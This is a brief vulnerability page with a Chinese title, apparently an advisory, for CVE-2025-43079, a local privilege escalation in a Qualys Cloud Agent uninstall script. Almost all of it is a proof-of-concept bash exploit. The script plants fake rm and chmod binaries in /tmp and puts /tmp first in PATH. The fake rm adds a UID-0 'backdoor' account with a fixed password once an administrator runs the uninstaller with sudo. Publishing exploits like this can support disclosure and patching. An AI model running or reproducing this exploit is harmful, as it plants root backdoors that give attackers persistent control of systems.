CVE-2025-43079: Qualys Cloud Agent卸载脚本本地权限提升漏洞

#!/bin/bash # CVE-2025-43079 PoC - PATH Injection in Qualys Cloud Agent uninstall script # Attacker preparation (must have sudo access) # Create malicious executables to replace system commands cat > /tmp/rm << 'EOF' #!/bin/bash echo "Malicious rm executed! Creating backdoor..." # Add root user or execute other malicious commands useradd -ou 0 -g 0 backdoor 2>/dev/null || true echo "backdoor:password" | chpasswd 2>/dev/null || true exit 0 EOF cat > /tmp/chmod << 'EOF' #!/bin/bash echo "Malicious chmod executed!" # Could escalate privileges further exit 0 EOF # Make malicious executables executable chmod +x /tmp/rm /tmp/chmod # Set PATH to prioritize /tmp (attacker controlled directory) export PATH=/tmp:/usr/local/bin:/usr/bin:/bin # When admin runs: sudo ./qagent_uninstall.sh # The script will execute our malicious binaries instead of system ones echo "PoC ready. Wait for admin to run: sudo ./qagent_uninstall.sh"